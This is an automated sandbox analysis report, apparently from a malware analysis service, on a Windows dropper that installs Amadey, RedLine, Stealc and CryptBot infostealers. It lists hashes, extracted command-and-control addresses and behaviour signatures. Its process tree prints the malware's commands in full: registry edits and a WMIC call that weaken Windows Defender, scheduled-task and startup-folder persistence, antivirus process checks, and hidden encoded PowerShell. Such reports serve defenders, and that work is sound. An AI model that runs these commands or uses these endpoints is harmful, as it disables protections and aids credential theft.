Analysis

  • max time kernel
    298s
  • max time network
    299s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    16-09-2024 05:01

General

  • Target

    3fe959722443c1171b390de870518f3be721b0ccadd49f2fe1d89fd1ee07458e.exe

  • Size

    1.8MB

  • MD5

    9731fffd7b478b386655c8b87eed24ac

  • SHA1

    92ad41f7bd9879774dc4e52e1781ccd8b328320e

  • SHA256

    3fe959722443c1171b390de870518f3be721b0ccadd49f2fe1d89fd1ee07458e

  • SHA512

    1e7558535668bf98d6bb5dd34dc37778387d56572005a4179e78719f108ea468f88ec10143281b6b2d4291f7c370bedded6cd3ae4b3303c0b88d9739314f3bbb

  • SSDEEP

    49152:7LMeoAgVVqdZIOdOq1bch/o/VoI2mEPUDjjx7yZX:7YrAgVVq5zEHXPUD35yN

Malware Config

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

C2

http://185.215.113.16

Attributes
  • install_dir

    44111dbc49

  • install_file

    axplong.exe

  • strings_key

    8d0ad6945b1a30a186ec2d30be6db0b5

  • url_paths

    /Jo89Ku7d/index.php

rc4.plain
1
a091ec0a6e22276a96a99c1d34ef679c

Extracted

Family

redline

Botnet

LiveTraffic

C2

95.179.250.45:26212

Extracted

Family

redline

Botnet

@OLEH_PSP

C2

65.21.18.51:45580

Extracted

Family

stealc

Botnet

default2

C2

http://185.215.113.17

Attributes
  • url_path

    /2fb6c2cc8dce150a.php

Extracted

Family

stealc

Botnet

default

C2

http://91.202.233.158

Attributes
  • url_path

    /e96ea2db21fa9a1b.php

Extracted

Family

redline

Botnet

bundle

C2

185.215.113.67:15206

Extracted

Family

cryptbot

C2

fivevd5vs.top

analforeverlovyu.top

Attributes
  • url_path

    /v1/upload.php

Extracted

Family

redline

Botnet

TG CLOUD @RLREBORN Admin @FATHEROFCARDERS

C2

91.194.55.146:29862

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • CryptBot

    CryptBot is a C++ stealer distributed widely in bundle with other software.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 14 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 28 IoCs
  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Indirect Command Execution 1 TTPs 19 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 59 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 26 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 14 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1128
      • C:\Users\Admin\AppData\Local\Temp\3fe959722443c1171b390de870518f3be721b0ccadd49f2fe1d89fd1ee07458e.exe
        "C:\Users\Admin\AppData\Local\Temp\3fe959722443c1171b390de870518f3be721b0ccadd49f2fe1d89fd1ee07458e.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Identifies Wine through registry keys
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2336
        • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
          "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2056
          • C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe
            "C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:2252
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2324
          • C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe
            "C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2820
            • C:\Users\Admin\AppData\Roaming\6InNj3SOTk.exe
              "C:\Users\Admin\AppData\Roaming\6InNj3SOTk.exe"
              5⤵
              • Executes dropped EXE
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2724
            • C:\Users\Admin\AppData\Roaming\bhh9YfYYwa.exe
              "C:\Users\Admin\AppData\Roaming\bhh9YfYYwa.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:952
          • C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe
            "C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Drops file in Windows directory
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:2188
            • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
              "C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:2828
          • C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
            "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            PID:2080
          • C:\Users\Admin\AppData\Local\Temp\1000129001\2.exe
            "C:\Users\Admin\AppData\Local\Temp\1000129001\2.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Checks processor information in registry
            PID:2052
            • C:\Users\Admin\AppData\Local\Temp\service123.exe
              "C:\Users\Admin\AppData\Local\Temp\service123.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:2332
            • C:\Windows\SysWOW64\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
              5⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:2728
          • C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe
            "C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:2704
            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
              C:\Users\Admin\AppData\Local\Temp\svchost015.exe
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:1840
          • C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe
            "C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2812
          • C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe
            "C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2764
          • C:\Users\Admin\AppData\Local\Temp\1000284001\acentric.exe
            "C:\Users\Admin\AppData\Local\Temp\1000284001\acentric.exe"
            4⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of AdjustPrivilegeToken
            PID:2312
          • C:\Users\Admin\AppData\Local\Temp\1000285001\2.exe
            "C:\Users\Admin\AppData\Local\Temp\1000285001\2.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:2412
          • C:\Users\Admin\AppData\Local\Temp\1000287001\splwow64.exe
            "C:\Users\Admin\AppData\Local\Temp\1000287001\splwow64.exe"
            4⤵
            • Executes dropped EXE
            • Drops file in Windows directory
            PID:576
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c move Emotions Emotions.bat & Emotions.bat
              5⤵
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:1660
              • C:\Windows\SysWOW64\tasklist.exe
                tasklist
                6⤵
                • Enumerates processes with tasklist
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:2704
              • C:\Windows\SysWOW64\findstr.exe
                findstr /I "wrsa opssvc"
                6⤵
                  PID:1924
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  6⤵
                  • Enumerates processes with tasklist
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1256
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
                  6⤵
                    PID:2984
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c md 607698
                    6⤵
                    • System Location Discovery: System Language Discovery
                    PID:1020
                  • C:\Windows\SysWOW64\findstr.exe
                    findstr /V "MaskBathroomCompositionInjection" Participants
                    6⤵
                      PID:2268
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c copy /b ..\Navy + ..\Temperature + ..\Streaming + ..\Ashley + ..\Ensures + ..\Language + ..\Viruses + ..\Bet + ..\Fla + ..\Asbestos + ..\Width Q
                      6⤵
                        PID:896
                      • C:\Users\Admin\AppData\Local\Temp\607698\Waters.pif
                        Waters.pif Q
                        6⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SendNotifyMessage
                        PID:2940
                      • C:\Windows\SysWOW64\choice.exe
                        choice /d y /t 5
                        6⤵
                          PID:2428
                    • C:\Users\Admin\AppData\Local\Temp\1000290001\crypted.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000290001\crypted.exe"
                      4⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • System Location Discovery: System Language Discovery
                      PID:2732
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:2736
                    • C:\Users\Admin\AppData\Local\Temp\1000293001\385121.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000293001\385121.exe"
                      4⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:1444
                      • C:\Users\Admin\AppData\Local\Temp\7zS4B91.tmp\Install.exe
                        .\Install.exe
                        5⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:1980
                        • C:\Users\Admin\AppData\Local\Temp\7zS4D46.tmp\Install.exe
                          .\Install.exe /sdidaXH "385121" /S
                          6⤵
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Enumerates system info in registry
                          PID:2348
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                            7⤵
                              PID:3004
                              • C:\Windows\SysWOW64\forfiles.exe
                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                8⤵
                                • Indirect Command Execution
                                PID:1252
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                  9⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2652
                                  • \??\c:\windows\SysWOW64\reg.exe
                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                    10⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2392
                              • C:\Windows\SysWOW64\forfiles.exe
                                forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                8⤵
                                • Indirect Command Execution
                                PID:2936
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                  9⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2300
                                  • \??\c:\windows\SysWOW64\reg.exe
                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                    10⤵
                                      PID:1652
                                • C:\Windows\SysWOW64\forfiles.exe
                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                  8⤵
                                  • Indirect Command Execution
                                  PID:2576
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                    9⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:884
                                    • \??\c:\windows\SysWOW64\reg.exe
                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                      10⤵
                                        PID:1388
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                    8⤵
                                    • Indirect Command Execution
                                    PID:2148
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                      9⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2872
                                      • \??\c:\windows\SysWOW64\reg.exe
                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                        10⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2352
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                    8⤵
                                    • Indirect Command Execution
                                    • System Location Discovery: System Language Discovery
                                    PID:2696
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                      9⤵
                                        PID:2988
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                          10⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Drops file in System32 directory
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:276
                                          • C:\Windows\SysWOW64\gpupdate.exe
                                            "C:\Windows\system32\gpupdate.exe" /force
                                            11⤵
                                              PID:1472
                                    • C:\Windows\SysWOW64\forfiles.exe
                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                      7⤵
                                      • Indirect Command Execution
                                      PID:1664
                                      • C:\Windows\SysWOW64\cmd.exe
                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                        8⤵
                                          PID:2520
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                            9⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Drops file in System32 directory
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:868
                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                              10⤵
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2544
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /CREATE /TN "bmbXFarNlpbNUcjZUs" /SC once /ST 05:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ASUPEepcmoJTSZEuB\LEUXBcbvazrcGrF\MYkdETq.exe\" NE /SvdidN 385121 /S" /V1 /F
                                        7⤵
                                        • Drops file in Windows directory
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:1948
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2348 -s 592
                                        7⤵
                                        • Loads dropped DLL
                                        • Program crash
                                        PID:2412
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:2636
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
                                3⤵
                                • System Location Discovery: System Language Discovery
                                • Scheduled Task/Job: Scheduled Task
                                PID:680
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url" & echo URL="C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url" & exit
                              2⤵
                              • Drops startup file
                              PID:1548
                          • C:\Windows\system32\taskeng.exe
                            taskeng.exe {ECACD0D0-A139-4215-AD14-73DAF2D955DB} S-1-5-21-4177215427-74451935-3209572229-1000:JSMURNPT\Admin:Interactive:[1]
                            1⤵
                              PID:328
                              • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                2⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:2576
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                2⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Drops file in System32 directory
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:236
                                • C:\Windows\system32\gpupdate.exe
                                  "C:\Windows\system32\gpupdate.exe" /force
                                  3⤵
                                    PID:1524
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                  2⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Drops file in System32 directory
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1944
                                  • C:\Windows\system32\gpupdate.exe
                                    "C:\Windows\system32\gpupdate.exe" /force
                                    3⤵
                                      PID:944
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                    2⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Drops file in System32 directory
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2600
                                    • C:\Windows\system32\gpupdate.exe
                                      "C:\Windows\system32\gpupdate.exe" /force
                                      3⤵
                                        PID:1976
                                    • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                      C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                      2⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:2364
                                    • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                      C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                      2⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:2684
                                    • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                      C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                      2⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:448
                                  • C:\Windows\system32\taskeng.exe
                                    taskeng.exe {40D7808E-9DD2-433E-8180-4D32F932009B} S-1-5-18:NT AUTHORITY\System:Service:
                                    1⤵
                                      PID:884
                                      • C:\Users\Admin\AppData\Local\Temp\ASUPEepcmoJTSZEuB\LEUXBcbvazrcGrF\MYkdETq.exe
                                        C:\Users\Admin\AppData\Local\Temp\ASUPEepcmoJTSZEuB\LEUXBcbvazrcGrF\MYkdETq.exe NE /SvdidN 385121 /S
                                        2⤵
                                        • Executes dropped EXE
                                        • Drops file in System32 directory
                                        • Modifies data under HKEY_USERS
                                        PID:1176
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:2984
                                          • C:\Windows\SysWOW64\forfiles.exe
                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                            4⤵
                                            • Indirect Command Execution
                                            • System Location Discovery: System Language Discovery
                                            PID:2988
                                            • C:\Windows\SysWOW64\cmd.exe
                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                              5⤵
                                                PID:2696
                                                • \??\c:\windows\SysWOW64\reg.exe
                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                  6⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2548
                                            • C:\Windows\SysWOW64\forfiles.exe
                                              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                              4⤵
                                              • Indirect Command Execution
                                              • System Location Discovery: System Language Discovery
                                              PID:1728
                                              • C:\Windows\SysWOW64\cmd.exe
                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                5⤵
                                                  PID:2788
                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                    6⤵
                                                      PID:2260
